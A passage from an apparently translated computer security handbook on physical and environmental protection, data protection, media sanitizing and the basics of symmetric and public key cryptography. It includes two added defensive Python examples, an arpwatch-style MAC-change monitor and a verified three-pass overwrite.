Computers, like people, work well within a particular range of temperatures. Most computer systems should be kept between 10 and 32 degrees Celsius (50 to 90 degrees Fahrenheit). If the ambient temperature around your computer gets too high, the computer cannot cool itself adequately and its internal components may be damaged. If the temperature gets too low, the system may suffer thermal shock, and its circuit boards or integrated circuits may crack when the computer is turned on.
Once you have determined the temperature range within which your computers can operate, make sure those temperatures are met. Pay particular attention to the heat sinks and airflow patterns of your equipment. Use temperature alarms to monitor the ambient temperature.
Electrical noise
Motors, fans, heavy equipment, and even other computers generate electrical noise that can cause intermittent problems for the computer you are using. This noise can be transmitted through the air or through power lines near your site.
Power surges are a special kind of electrical noise consisting of one or more high-voltage pulses. Where possible, each computer should have a separate electrical circuit and a ground wire, with an isolated power filter. Under no circumstances should a computer share a circuit with heavy electrical equipment. Radio transmitters (including mobile phones) should be kept away from computers.
Lightning
Lightning generates large power surges that can damage even computers that have electrical protection. If lightning strikes the metal frame of your building (or hits its lightning rod), the resulting current can create a strong magnetic field on its way to ground. Computers should be unplugged during lightning storms; if that is not possible, use surge suppressors. Although these devices will not protect equipment against a direct strike, they help when the storms are distant. Magnetic media should be kept as far as possible from the metal structure of the building. Never use copper network cable outside a building unless it is inside metal conduit.
Water
Water can destroy your computer. The primary danger is an electrical short circuit, which occurs when water bridges a voltage-carrying line and a ground trace on a circuit board.
Water usually comes from rain or flooding, and sometimes from sprinkler systems that go out of control. Water may also come from unexpected places, such as overflowing washrooms on higher floors, from vandalism, or from the fire department.
Move computers out of basements that are prone to flooding. Install water sensors on the floor of the rooms that house computers and also under raised floors, and use them to cut the power automatically if flooding occurs.
Food and drink
Food, especially greasy food, sticks to people's fingers and from there is transferred to whatever they touch. This often includes surfaces that are sensitive to dirt, such as magnetic tapes and optical disks. One of the fastest ways to put a desktop keyboard out of action is to spill a soft drink or a cup of coffee on its keys.
In general, the simplest rule is also the safest: keep all food and drink away from your computer systems. [56]
[56] This rule is perhaps more important than any other in this chapter, and it is often violated.
Other environmental hazards
Other environmental hazards may also arise:
• Dust - Keep your computer rooms as free of dust as possible, and use a special computer vacuum cleaner with a very fine filter for cleaning at regular intervals.
• Explosion - If you must use a computer in an environment where there is a risk of explosion, you should use explosion-proof enclosures. Backups should also be kept in explosion-proof enclosures or off-site.
• Insects - Take effective measures to limit the number of insects in your computer room.
• Vibration - In a high-vibration environment, place computers on a rubber or soft mat, in such a way that the ventilation openings are not blocked.
• Humidity - Monitor the humidity of the environment and keep it at an appropriate level.
Environmental monitoring
To detect unexpected problems, continuously monitor and record the temperature and relative humidity of the computer room. As a general rule, every 1000 square feet of office space should have its own recording equipment. Review and report on what you have recorded at regular intervals.
Physical access control
Common sense tells you to keep your computer in a locked room; but how secure is that room? Sometimes a room that appears to be secure is in fact completely insecure.
Raised floors and dropped ceilings
In many modern office buildings, the interior walls of a room do not extend above the ceilings or below the floors. This type of construction makes access from adjacent rooms and offices easy.
Entry through air ducts
If the air ducts that supply your computer room are large enough, intruders can use them to enter your otherwise secure area. Environments that need a great deal of ventilation should use several small ducts, or one large duct with screens welded to the air vents or inside the ducts. In a very high-security environment, motion detectors can also be used inside the ducts.
Glass walls
Although glass walls and large windows are usually used to enhance architectural appearance, they can be serious security risks. Glass walls are easily broken; a brick and a bottle of gasoline thrown at a window can cause considerable damage. An attacker can easily obtain vital information, such as passwords or information about how the system operates, simply by watching the people on the other side of a glass wall or window. It may also be possible to obtain information from behind a frosted pane by analyzing the light reflected from it. Interior glass walls are good for rooms that must be guarded but that the guard is not allowed to enter; in all other cases they should be avoided.
Protecting against vandalism
Computer systems are attractive targets for vandalism. The reasons for vandalism can include revenge, riots, strikes, political and ideological statements, or simply entertainment for the foolish. In principle, any part of a computer system, or the building that houses it, may be a target of vandalism. In practice, some targets are more vulnerable than others.
Ventilation holes
Years ago, 60 workstations at the Massachusetts Institute of Technology (MIT) were destroyed in a single afternoon by a student who poured his soft drink into the ventilation holes of each computer.
Computers that have ventilation slots need them. You cannot block these slots to prevent this kind of vandalism; instead, bringing food and drink into the computer room must be strictly forbidden, or 24-hour protection must be provided by a guard or closed-circuit television.
Network cables
In many cases a vandal can disable an entire subnet of workstations by cutting a single wire with a pair of wire cutters. Compared with Ethernet, fiber-optic cables are more vulnerable (they can be damaged more easily), harder to repair (they are difficult to splice), and more attractive targets (they usually carry more information).
"Temporary" cabling in a facility usually ends up being used permanently, so spend the extra time and effort to install the cable properly in the first place. A simple way to protect a network cable is to run it through physically secure locations. For example, Ethernet can be run through steel conduit. Besides protecting against vandalism, this approach also helps protect against some kinds of network eavesdropping, and it may preserve your cables in the event of a small fire. If someone steps on a fiber-optic cable, small fractures may occur in it. Finding a fracture of this kind is difficult, because no sign of it can be seen on the cable jacket.
Some very secure facilities use double-walled shielded conduit with pressurized gas between the layers. If the pressure inside the walls drops, the conduit's pressure sensors stop the traffic passing over the lines or sound an alarm. This happens when, for example, someone makes a hole in the conduit walls.
Network connectors
In addition to cutting a cable, an attacker who has access to a network endpoint, or a network connector, can electrically disable the system or damage the network. All wired networks are vulnerable to high-voltage attacks.
Utility connections
In many buildings it is easy to cut off electricity, gas, and water, sometimes even from outside the building. Because computers need electrical power, and because temperature-control systems may depend on gas heaters or water coolers, this can give vandals additional points of attack.
Defending against acts of war and terrorism
Because it is impossible to protect against many attacks, consider a system of hot backups and mirrored disks and servers. With a reasonably fast network connection, you can arrange for the files stored on one computer to be copied simultaneously to another system on the other side of town or the other side of the world. Sites that cannot have simultaneous backup can make hourly or nightly incremental dumps. Although a suicide bombing may destroy your computer center, your data can be safely protected elsewhere.
Preventing theft
Computer theft, especially laptop theft, can be a painful experience, but if the computer contains irreplaceable or extremely sensitive information, it can prove costly for the victim.
Many computer systems are stolen for resale, either as complete systems or, if the thieves are skilled, as separate parts, which are harder to trace. Some computers are stolen by people who cannot afford a computer of their own. Some computers are stolen for the information stored on them, usually by people who want to obtain that information, and sometimes by people who want to deprive the computer's owner of the use of that information. It does not matter why a computer is stolen; most computer thefts have one element in common: opportunity. In many cases, computers were stolen because they had been left unprotected.
Laptops and other kinds of portable computers have their own particular risks. They are easily stolen, difficult to tie down (otherwise they would no longer be portable!), and easily resold. People who use laptops should be trained to take great care in protecting them. Theft of these computers, especially at airports, is reported to be a major problem at present. Laptops should never be left unattended anywhere, for any length of time. If you travel by taxi, keep your laptop with you rather than in the trunk.
Fortunately, by taking a small number of simple, low-cost measures you can greatly reduce the risk of laptop or desktop theft.
Locks
One good way to protect a computer from theft is to secure it physically. A variety of physical tie-down devices are available for fastening computers to desks and cabinets. Although these devices cannot prevent theft, they make it more difficult.
Easy portability is an important selling point of laptops and also the main reason they are stolen. One of the best ways to reduce the chance of a laptop being stolen is to lock it, at least temporarily, to a desk, a pipe, or another large object.
Most laptops sold today are equipped with a security slot. For less than 50 dollars you can buy a cable lock that locks the laptop's security slot to nearby objects. Once the device is locked to something, it cannot be released without the key or without damaging the device, and a damaged computer is very hard to resell. Locks of this kind mostly prevent laptops from being snatched by street thieves.
Tagging
Another way to reduce the chance of theft and increase the likelihood that a laptop will be returned is to engrave a name and telephone number on it, or to tag it with permanent or semi-permanent tags. The presence of these tags makes it very hard for buyers or sellers to claim that they did not know the computer was stolen.
The tags of a good tagging system are clearly visible and carry a unique serial number that allows the organization to track its property. A low-cost tagging system is produced by the company Secure Tracking of Office Property (STOP) [58]. These tags are assigned a unique serial number and come with 3 years of support in Europe, Australia, Latin America, and North America. If a piece of equipment with a STOP tag is found, the company can arrange for it to be returned to its original owner.
[58] Secure Tracking of Office Property (http://www.stoptheft.com)
Laptop recovery software and services
Today various companies sell programs for "tracking" personal computers. The tracking program hides in several parts of the laptop and from time to time places a call to the tracking service to report its location. This call may be made over a telephone line or a network connection. Normally these calls are ignored, but if the laptop has been registered as "stolen" at the tracking service center, the police will be informed of the location of the stolen item.
Many of these systems work on desktop machines as well as on laptops. You can therefore protect in this way any systems that you believe are at high risk of being stolen.
Component theft
When the price of RAM was high, businesses and universities suffered from repeated thefts of RAM. Many computer companies and universities have seen large thefts of advanced processors. RAM and the latest-model processors are easily sold on the open market. These processors are untraceable, and when thieves steal only part of the RAM inside a computer, weeks or months may pass before the theft is noticed. If a user complains that a computer is suddenly running much more slowly than it did yesterday, check its RAM, and then check whether its case is physically secured.
Encryption
If your computer is stolen, the information on it will be put to whatever use its new owner sees fit. They may erase the information or read it. Sensitive information may be sold, used in defamatory mailings, or used to abuse other computers.
You can never make something completely theft-proof, but you can make stolen information nearly useless; for this it is enough that the device is encrypted and the thief does not know the encryption key. For this reason, even with the best computer security mechanisms and physical deterrents, sensitive information should be encrypted with an encryption scheme that is difficult to break. We recommend using a strong encryption system so that, even if your computer is stolen, the sensitive information on it cannot easily be misused.
Protecting data
There is a great deal of overlap between the physical security of your computer equipment and the confidentiality, integrity, and correctness of your data. After all, if someone steals your computer, they naturally have its data as well. Unfortunately, your data is exposed to a variety of attacks that can render ineffective the physical measures described in the previous sections.
Eavesdropping
Electronic eavesdropping is perhaps one of the most sinister forms of unauthorized data disclosure. Even with the most ordinary equipment, an eavesdropper can make a complete copy of the victim's actions: every keystroke on the keyboard and every piece of information that is displayed on the screen or sent to the printer. Meanwhile the victim is usually unaware of the attacker's presence and trustingly goes about their work, exposing to theft not only sensitive information but also passwords and the various procedures for obtaining more information.
Eavesdropping tools exist for many points in a computer system: the connection between keyboard and computer, data cables and wiring, Ethernet and fiber-optic networks, wireless networks, and even the radio emissions from the equipment. There are various ways to make eavesdropping more difficult:
• Regularly inspect data-carrying cables and wires for damage or physical alterations, and consider using shielded or armored cable to make tapping the wires more difficult. If security matters a great deal to you, place the cables in steel conduit.
• Make sure that unused offices do not have active Ethernet ports. Use Ethernet switches instead of Ethernet hubs. Use LAN monitoring software such as arpwatch, which identifies packets with previously unseen MAC [59] addresses, or use switches that can filter packets by MAC address. Wherever possible, use fiber-optic cable instead of copper cable, because it is harder to tap covertly.
• Avoid using wireless networks. If you really must build a wireless network, enable every available security feature for defense in depth (such as encryption, firewalls, disabling SSID broadcasts, MAC filters, and so on). Because most of these features provide very little security, train users always to use a VPN or other encrypted tunnel on the wireless network. Place the wireless access point outside the firewall (or between two firewalls).
• Encryption provides considerable protection against eavesdropping. So always assume that your communications are being monitored, and treat the encryption of all communications as necessary. When this is not possible, at least encrypt all sensitive network traffic (such as the usernames and passwords of remote services).
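
The check that the list above attributes to arpwatch, reporting a MAC address with no prior history, is shown here as an added example; it is not arpwatch's own code or output format. The observation format, the event names, the baseline inventory and the sample addresses are all constructed for the illustration.

```python
"""arpwatch-style tracking of IP-to-MAC pairings (illustrative, not arpwatch itself)."""
import re

MAC_RE = re.compile(r"^(?:[0-9a-f]{2}:){5}[0-9a-f]{2}$")

# Constructed observations, one per line: "<epoch-seconds> <ip> <mac>".
# In practice these would come from a sniffer or from a switch's ARP table.
SAMPLE_OBSERVATIONS = """\
1000 192.0.2.10 00:11:22:33:44:55
1005 192.0.2.11 00:11:22:33:44:66
1060 192.0.2.10 00:11:22:33:44:55
1200 192.0.2.12 de:ad:be:ef:00:01
1300 192.0.2.10 DE-AD-BE-EF-00-01
1310 192.0.2.10 00:11:22:33:44:55
this line is damaged
"""

# Constructed inventory of pairings the administrator already trusts.
BASELINE = {
    "192.0.2.10": "00:11:22:33:44:55",
    "192.0.2.11": "00:11:22:33:44:66",
}


def normalize_mac(raw):
    """Return the MAC as lower-case colon-separated hex, or None if malformed."""
    mac = raw.strip().lower().replace("-", ":")
    return mac if MAC_RE.match(mac) else None


def parse_observation(line):
    """Parse one observation line into (timestamp, ip, mac), or None."""
    parts = line.split()
    if len(parts) != 3 or not parts[0].isdigit():
        return None
    mac = normalize_mac(parts[2])
    if mac is None:
        return None
    return int(parts[0]), parts[1], mac


class MacWatch:
    """Remember which MAC answered for each IP and report changes."""

    def __init__(self, baseline=None):
        self.current = {}        # ip -> MAC seen most recently
        self.history = {}        # ip -> every MAC ever seen for that ip
        self.known_macs = set()  # every MAC seen anywhere on the LAN
        for ip, raw in (baseline or {}).items():
            mac = normalize_mac(raw)
            if mac is None:
                raise ValueError(f"bad baseline MAC for {ip}: {raw!r}")
            self.current[ip] = mac
            self.history[ip] = {mac}
            self.known_macs.add(mac)

    def observe(self, ts, ip, mac):
        """Record one pairing; return (ts, kind, ip, mac, previous) or None."""
        previous = self.current.get(ip)
        seen = self.history.setdefault(ip, set())
        if mac not in self.known_macs:
            kind = "new-mac"          # address with no prior history
        elif previous is None:
            kind = "new-pairing"      # known adapter, IP not seen before
        elif previous != mac:
            # An IP bouncing between two adapters is a different signal
            # from an IP moving to an adapter for the first time.
            kind = "flip-flop" if mac in seen else "changed-mac"
        else:
            kind = None
        seen.add(mac)
        self.known_macs.add(mac)
        self.current[ip] = mac
        return (ts, kind, ip, mac, previous) if kind else None


def scan(text, baseline=None):
    """Run all observations through MacWatch; return (alerts, skipped_lines)."""
    watch = MacWatch(baseline)
    alerts, skipped = [], 0
    for line in text.splitlines():
        if not line.strip():
            continue
        parsed = parse_observation(line)
        if parsed is None:
            skipped += 1  # keep count: a noisy feed can hide real events
            continue
        alert = watch.observe(*parsed)
        if alert:
            alerts.append(alert)
    return alerts, skipped


if __name__ == "__main__":
    found, bad = scan(SAMPLE_OBSERVATIONS, BASELINE)
    for ts, kind, ip, mac, old in found:
        print(f"{ts} {kind:12} {ip} now {mac} was {old}")
    print(f"{bad} unparseable line(s) skipped")
```

On the constructed sample, the unknown adapter is reported when it first appears, again when it answers for an address that belongs to a trusted machine, and a third time when the trusted machine reclaims that address.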
Protecting backups
Backups should be a prerequisite of any computer operation, secure or not, but the information stored on backup tapes is extremely vulnerable. Protect your backups at least as well as you normally protect your computer. Never leave them unattended in a publicly accessible area, keep them in physically secure locations (preferably somewhere other than where your computers are kept), and be careful whom you trust to carry them from one place to another.
Most backup programs allow you to encrypt the data before it is written to the backup. Encrypted backups considerably reduce the usefulness of stolen compact discs or backup tapes to an adversary. If you encrypt your backups, make sure that you also protect the encryption key, both so that an attacker cannot find it and so that the key is not lost when staff change.
Sometimes archived backups are slowly erased by environmental conditions. For example, magnetic tape is susceptible to a process called print through, in which the magnetic fields of one section of tape wound on the reel affect the layers beneath it. The only way to find out whether this is damaging a backup is to check the backups from time to time.
[59] MAC: the fixed physical address of each node on the network.
A very common problem is inadequate labeling and inventorying of backup media. You can choose any labeling or cataloging system that you find effective, provided that you choose one and document it thoroughly.
Sanitizing media before disposal
When you retire disk drives, compact discs, or tapes, make sure that the data on the media has first been completely erased. This process is called sanitizing. Simply deleting a file on your hard disk in the ordinary way does not destroy the file's data. Usually parts of the original data, and sometimes the whole file, can easily be recovered. Hard disks should be sanitized with special software written specifically for each type of disk drive.
For tapes you can use a degausser or bulk eraser, a hand-held electromagnetic device with a strong magnetic field. Read back the tapes that you have bulk-erased until you learn how many erasures of this kind are needed to obliterate the data.
Software exists for overwriting optical media that erases even the contents of write-once media. However, the effectiveness of these methods varies from one type of media to another, and overwriting may still leave remnants. For this reason, physical destruction may be preferable.
Incinerators and acid baths are very suitable for destroying tapes, but they are not environmentally acceptable. Until recently, breaking up hard disks and floppy packs was preferred, but as disk capacities increase, disk drives must be broken into smaller and smaller pieces to rule out laboratory analysis of the resulting material. Degaussers exist for disk drives, but their cost is high. As a result, physical sanitization and destruction methods are gradually losing ground to software techniques.
A common sanitizing method is to overwrite the entire disk or tape. If you deal with highly confidential or security-related information, you may want to overwrite a tape or disk several times, because data can possibly be recovered from tapes that have been overwritten only once. Tapes are usually overwritten three times: once with blocks of "zeros", once with blocks of "ones", and once with random numbers. Finally, the tape can be passed several times through a band saw so that it is reduced to thousands of tiny pieces of plastic.
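
The three-pass overwrite described above (zeros, ones, random data), with a read-back check after every pass, is shown here as an added example that is not part of the handbook. A regular file stands in for the medium, which is an assumption made for the demonstration; the function names and the sample content are constructed.

```python
"""Three-pass overwrite (zeros, ones, random) with read-back verification."""
import hashlib
import os
import tempfile

CHUNK = 64 * 1024
PASSES = (
    ("zeros", lambda n: b"\x00" * n),   # every bit cleared
    ("ones", lambda n: b"\xff" * n),    # every bit set
    ("random", os.urandom),             # unpredictable data
)


def _write_pass(path, size, make_chunk):
    """Overwrite the first `size` bytes in place; return SHA-256 of what was written."""
    digest = hashlib.sha256()
    with open(path, "r+b") as fh:
        remaining = size
        while remaining:
            block = make_chunk(min(CHUNK, remaining))
            fh.write(block)
            digest.update(block)
            remaining -= len(block)
        fh.flush()
        os.fsync(fh.fileno())  # push the pass to the device before verifying
    return digest.hexdigest()


def _read_digest(path):
    """Return (SHA-256, length) of the file as read back from storage."""
    digest, length = hashlib.sha256(), 0
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(CHUNK), b""):
            digest.update(block)
            length += len(block)
    return digest.hexdigest(), length


def contains(path, needle):
    """Search the file for `needle`, including matches that straddle chunks."""
    tail = b""
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(CHUNK), b""):
            if needle in tail + block:
                return True
            tail = block[-(len(needle) - 1):] if len(needle) > 1 else b""
    return False


def sanitize(path):
    """Run the three passes; return [(pass_name, verified)] in order."""
    size = os.path.getsize(path)
    results = []
    for name, make_chunk in PASSES:
        written = _write_pass(path, size, make_chunk)
        read_back, length = _read_digest(path)
        # A pass counts only if what comes back is exactly what was written.
        results.append((name, written == read_back and length == size))
    return results


def demo():
    """Build a constructed image, sanitize it, and report what survived."""
    marker = b"CONSTRUCTED-SECRET:payroll-2003"  # constructed sample content
    fd, path = tempfile.mkstemp(suffix=".img")
    try:
        with os.fdopen(fd, "wb") as fh:
            fh.write(b"header" + marker * 5000 + b"trailer")
        size_before = os.path.getsize(path)
        found_before = contains(path, marker)
        results = sanitize(path)
        found_after = contains(path, marker)
        size_after = os.path.getsize(path)
    finally:
        os.remove(path)
    return found_before, results, found_after, size_before == size_after


if __name__ == "__main__":
    before, passes, after, same_size = demo()
    print("marker present before:", before)
    for name, ok in passes:
        print(f"pass {name:6} verified: {ok}")
    print("marker present after:", after, "| size unchanged:", same_size)
```

The read-back check plays the same role as re-reading bulk-erased tapes: it confirms what the medium now returns, and a pass that fails verification should be treated as not having happened.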
Sanitizing printed documents
Written material that is sent to the trash may contain information that is useful to criminals or competitors. This includes printed copies of software (including incomplete versions), memos, design documents, program source text, planning documents, internal newsletters, company telephone books and manuals, and other items. Other information that may end up in the trash includes the types and versions of operating systems and computers, serial numbers, patch levels, and the like. These documents may contain hostnames, IP numbers, user IDs, and other information that is vital to an attacker. Some companies have reportedly thrown away, without any special care, complete listings of their firewall configurations and filtering rules, a gold mine for anyone trying to break into their computers.
Provide a paper shredder wherever valuable information is thrown away. Train users not to throw sensitive information into household trash bins but to bring it to the office to be shredded. If your organization is large enough and the law allows it, you may wish to incinerate some of your sensitive paper waste on the premises.
Protecting local storage
In addition to computers and mass-storage systems, many other pieces of electronic data-processing equipment also store information. For example, terminals, modems, and laser printers usually have memory buffers that can be loaded or unloaded with the appropriate control commands.
Naturally, any piece of memory that stores sensitive information poses a security problem, especially if that memory is not protected by a password, encryption, or a similar mechanism. However, the local storage in many devices poses an additional security problem, because sensitive information is frequently copied into it without the computer user's knowledge.
Unattended terminals
Unattended terminals on which users have left themselves logged in are of great interest to vandals and computer attackers. A vandal can confidently access the person's files. Alternatively, the vandal can use the person's account as a starting point for launching an attack against the computer system or the entire network: any tracing of the attack will naturally point the finger at the owner of the account and not at the vandal. Terminals should never be left unattended for more than short periods of time.
Some systems or screen savers are able to log a user out automatically (or at least blank the screen and lock the keyboard) if the user's terminal has been idle for more than a few minutes. Take advantage of these features.
Key switches
Some kinds of computers have a key switch that can be used to prevent the system from being rebooted in single-user mode. Some computers also have ROM monitors that prevent the system from being rebooted in single-user mode without a password. Sun's OpenBoot system and all new Macintosh systems support passwords for controlling access to the boot configuration.
Key switches and ROM monitor passwords provide additional security and should be used whenever possible. [66] However, it should be remembered that to disrupt a computer it is enough for someone to unplug it. Therefore the most important way to protect a computer is to restrict physical access to it.
[66] There is another good reason to use ROM monitor passwords. Consider what could happen if an attacker gained access to a computer, set a password on it, and then turned it off.
Chapter Four
Information security
Overview
This chapter focuses on mechanisms that protect information from unwanted disclosure, alteration, or destruction. These dimensions of security are usually called confidentiality [67] (which prevents unauthorized users from accessing or changing data and programs) and system integrity (which gives assurance that information and software have remained intact and correct). The discussion in this section is largely conceptual, although examples of how several of the principles are applied in real systems are given.
[67] Or "privacy", which is sometimes used interchangeably with "confidentiality" and sometimes refers more specifically to the protection of individuals' personal information.
Cryptography
Cryptography is a set of mathematical techniques for protecting information. Using cryptography, written words and other kinds of messages can be transformed so that they appear meaningless to anyone who does not possess the special mathematical key needed to unlock them. Using cryptography to disguise a message is called encryption. The process of returning an encrypted message to its original form using the appropriate key is called decryption.
Cryptography is used to prevent an unauthorized recipient from accessing information. In theory, when a piece of information is encrypted and then accidentally intercepted or disclosed by a third party, its security is not compromised, provided that the key needed to decrypt the information has not been disclosed and the encryption method resists attempts at decryption without the key.
Besides enhancing confidentiality, cryptography is also used to ensure message integrity and non-repudiation.
Cryptographic functions and algorithms
There are basically two kinds of encryption algorithms:
Symmetric key algorithms
In these algorithms the same key is used to encrypt and to decrypt the message. Symmetric key algorithms are sometimes called secret key algorithms and sometimes private key algorithms. Unfortunately, both of these names are easily confused with public key algorithms, which are unrelated to symmetric key algorithms. Symmetric key algorithms can be divided into two categories: block algorithms and stream algorithms. Block algorithms encrypt the data one block (a number of bytes) at a time, whereas stream algorithms encrypt it byte by byte (or even bit by bit).
Symmetric key algorithms are the workhorses of modern cryptographic systems. They are generally much faster than public key algorithms and somewhat easier to implement. Unfortunately, symmetric key algorithms have three problems that limit their use in the real world:
• For the two parties to a computer communication to exchange information securely with a symmetric key algorithm, they must first exchange an encryption key. Exchanging an encryption key securely can be very difficult.
• Since they want to send or receive messages, both parties must hold a copy of the key and keep it secure. If one party's key is compromised and the other party is unaware of it, the second party may send a message to the first, and that message can then be abused using the compromised key.
• If every pair of users wants to use this kind of algorithm to secure their communication, each two-party communication needs its own unique key, which for N different users requires (N^2 - N) / 2 keys. As the number of users grows, this number quickly becomes unmanageable.
Asymmetric key algorithms
In these algorithms one key is used to encrypt the message and another key to decrypt it. Public key cryptosystems are an important class of asymmetric key algorithms. In these algorithms the encryption key is usually called the public key, because it can be made available to everyone without compromising the secrecy of the message or of the decryption key. The decryption key is usually called the "private key" or the "secret key".
By separating the encryption and decryption keys, public key algorithms largely solve the problems of symmetric key algorithms. From a theoretical point of view, public key technology makes it relatively easy to send someone an encrypted message. People who wish to receive encrypted messages will naturally publish their public keys in public lists or directories so that they are easy to obtain. To send an encrypted message, all we then have to do is find the person's public key, encrypt the message, and send it to them. In a good public key system, the only one who can decrypt the message is the holder of the corresponding private key. Furthermore, the only thing we need to store on our own machine is our own private key.
Public key cryptography is also used to create digital signatures. Like a real signature, a digital signature can be used to indicate an identity. Here too, as with paper letters, you can sign an electronic letter and thereby assure others that you wrote it; and as with signing a bill of sale, you can also sign a transaction document electronically to show that you wish to order or sell some goods. In public key technology the private key is used to produce the digital signature, and others can then use the corresponding public key to verify that the signature is valid.
Unfortunately, public key algorithms are computationally expensive. In practice, public key encryption and decryption require 1000 times the computing power of an equivalent symmetric key encryption algorithm. To obtain the advantages of public keys as well as the speed of symmetric cryptosystems, most modern encryption systems actually use a combination:
Hybrid public/private cryptosystems
In these systems the slower public key encryption is used to exchange a random session key, which then serves as the basis for a symmetric private key algorithm (a "session key" is used for only one encryption session and is then discarded). Nearly all practical implementations of public key cryptography are hybrid systems.
Finally, there is a special class of functions that are almost always used together with public key cryptography. These algorithms are not encryption algorithms in themselves; rather, they are used to create a "fingerprint" of a file or of a key:
Message digest functions
A message digest function produces a seemingly random pattern of bits for any input. The digest value is computed in such a way that finding an input that produces exactly a given digest is computationally infeasible. Message digests are often called "file fingerprints". Most systems that perform digital signatures encrypt a message digest of the data rather than the original file data.
Cryptographic strength of symmetric algorithms
Different encryption algorithms are not equal in strength. Some systems do not protect data very well and allow encrypted information to be decrypted without knowledge of the required key. Others are highly resistant even to the strongest attacks. The ability of a cryptographic system to protect information against attack is called its strength. Strength depends on many factors, including:
• The secrecy of the key;
• The difficulty of guessing the key or of trying all possible keys (a key search). Longer keys are usually harder to find or guess;
• The difficulty of inverting the encryption algorithm without knowing the encryption key (breaking the algorithm);
• The absence of back doors, or of other conditions that make an encrypted file easier to decrypt without knowing the decryption key;
• The impossibility of decrypting an entire encrypted message when you know how part of it decrypts (this is called a known plaintext attack); and
• The properties of the "plaintext" and an attacker's knowledge of those properties. For example, if all encrypted messages in a cryptographic system begin or end with a known piece of "plaintext", that system may be vulnerable to attack.
In general, cryptographic strength is never proven; it is only disproven. When a new encryption algorithm is proposed, its creator almost always believes that the algorithm guarantees perfect security, that is, the creator believes there is no way to decrypt an encrypted message without possessing the corresponding key, because if the algorithm had a known flaw, the creator would not have proposed it in the first place (or at least would not have proposed it in good conscience).
As part of examining an algorithm's strength, a mathematician can show that the algorithm is resistant to specific kinds of attacks that have previously been used to demonstrate flaws in other algorithms. Unfortunately, even an algorithm that resists every known attack is not necessarily secure, because new kinds of attacks are continually being developed.
From time to time, individuals or organizations claim to have invented symmetric encryption algorithms that are far more secure than existing ones. In general, such claims should not be welcomed too warmly. Since there is today no known attack against the encryption algorithms that are in wide use, there is no reason to use new and untested encryption algorithms, which may have hidden flaws.
Key length in symmetric key algorithms
Short keys can significantly compromise the security of encrypted messages, because an attacker can decrypt the message with every possible key until its content is recovered. But while short keys provide comparatively little security, extremely long keys do not, in practice, necessarily provide much more security than keys of moderate length. That is, while 40- to 56-bit keys are not very secure, a 256-bit key does not provide substantially more security than a 168-bit or even a 128-bit key.
If you are trying to decrypt a message and do not have a copy of the key, the simplest way to decrypt it is a brute force attack. These attacks are also called "key search attacks", because they try every possible key to determine whether that key decrypts the message. If the key is chosen at random, the attacker will on average need to try half of all possible keys to find the actual decryption key.
Inside a computer, a cryptographic key is represented as a string of binary digits. Each binary digit can be 0 or 1. In general, each bit added to a key doubles the number of possible keys. The question of "how many bits are enough to make a key secure" therefore depends on how fast the attacker can try different keys and on how long you want to keep your information secure. If the attacker can try 10 keys per second, a 40-bit key can protect a message for more than 3484 years. Of course, today's computers can try several thousand keys per second and, with special-purpose hardware and software, hundreds of thousands of keys per second. Key search speed can be increased further by running the same program on hundreds or thousands of computers simultaneously. With today's technology it is therefore possible to check more than a million keys per second.
If you are able to try a million keys per second, you can check all 40-bit keys in only 13 days. If a 40-bit key is so clearly insufficient to keep information secure, how many bits does a secure key need? If you could try a billion keys per second, trying all 80-bit keys would still require 38 million years. Searching a 128-bit key would require 10^22 years with today's technology, and hundreds of millions of years even with advances in quantum computing. Given that our Sun is likely to become a red giant within the next 4 billion years and, in doing so, destroy the Earth, and assuming that there is no other weakness in the algorithm used, a 128-bit encryption key should be sufficient for most cryptographic applications!
Common symmetric key algorithms
Many symmetric key algorithms are in use today. Some of the algorithms most commonly used in the field of computer security are summarized below [82].
DES
The Data Encryption Standard (DES), adopted as a U.S. government standard in 1977 and as an ANSI standard in 1981, is a block encryption algorithm that uses a 56-bit key and has several modes of operation, depending on the purpose for which it is used. DES is a strong algorithm, but its short key length limits its use today. In 1998 a special-purpose machine for breaking DES was built by the Electronic Frontier Foundation (EFF) for less than 25,000 dollars, and in a public demonstration it found the key of an encrypted message in less than a day, before the eyes of members of a coalition of computer users from around the world.
Triple-DES
Triple-DES is a method that makes DES significantly more secure by applying the DES encryption algorithm three times with three different keys, which brings the total key length to 168 bits. This algorithm, also known as "3DES", has been used widely by financial institutions and by the Secure Shell (SSH). In theory, using DES twice with two different keys does not improve security as much as one might at first expect, because of a known plaintext attack called meet-in-the-middle, in which the attacker simultaneously tries to encrypt the plaintext with one single DES operation and to decrypt the ciphertext with another single DES operation until a match is found in the middle.
Blowfish
Blowfish is a fast, compact, and simple block encryption algorithm invented by Bruce Schneier. The algorithm has a variable-length key of up to 448 bits and is optimized for execution on 32-bit and 64-bit processors. The algorithm is currently unpatented and has been placed in the public domain. Blowfish is used in the Secure Shell and in other similar programs.
IDEA
The International Data Encryption Algorithm (IDEA) was developed in Zurich, Switzerland, by James L. Massey and Xuejia Lai and was published in 1990. IDEA uses a 128-bit key and is used by the well-known PGP program to encrypt files and electronic mail. Unfortunately, wider use of IDEA has been limited by a series of software patents on the algorithm, which are currently held by Ascom-Tech AG in Solothurn, Switzerland.
82 A more complete list of these algorithms appears on pages 169 to 176 of the book "Practical Unix & Internet Security" (PUIS), published by O'Reilly.
RC4
This stream encryption algorithm was originally developed by Ronald Rivest and was kept as a trade secret by RSA Data Security. The algorithm was revealed in 1994 by an anonymous Usenet user and appears to be reasonably strong. RC4 uses keys of between 1 and 2048 bits.
Rijndael (AES)
This algorithm was developed by Joan Daemen and Vincent Rijmen and was selected in October 2000 by the National Institute of Standards and Technology (NIST) as the new U.S. Advanced Encryption Standard. Rijndael is an extraordinarily fast and compact cipher that can use keys of 128, 192, or 256 bits.
Cryptographers examine the strength of their algorithms through peer review. When an algorithm is published, other cryptographers look for its flaws or weaknesses. Do not trust people who claim to have invented a new encryption algorithm, because if they are unwilling to disclose how their algorithms work, it may be because doing so would undermine the credibility of those algorithms. In practice there is no reason to keep an algorithm secret, because real security lies in openness.
On the other hand, it is important to understand that merely publishing an algorithm or a piece of code does not guarantee that its flaws will be found. The WEP encryption algorithm, which was introduced by the 802.11 networking standard, was in use for years before a significant flaw was found in it. The flaw had been there all along, but no one had run into a problem that prompted them to go looking for one.
One-time pads
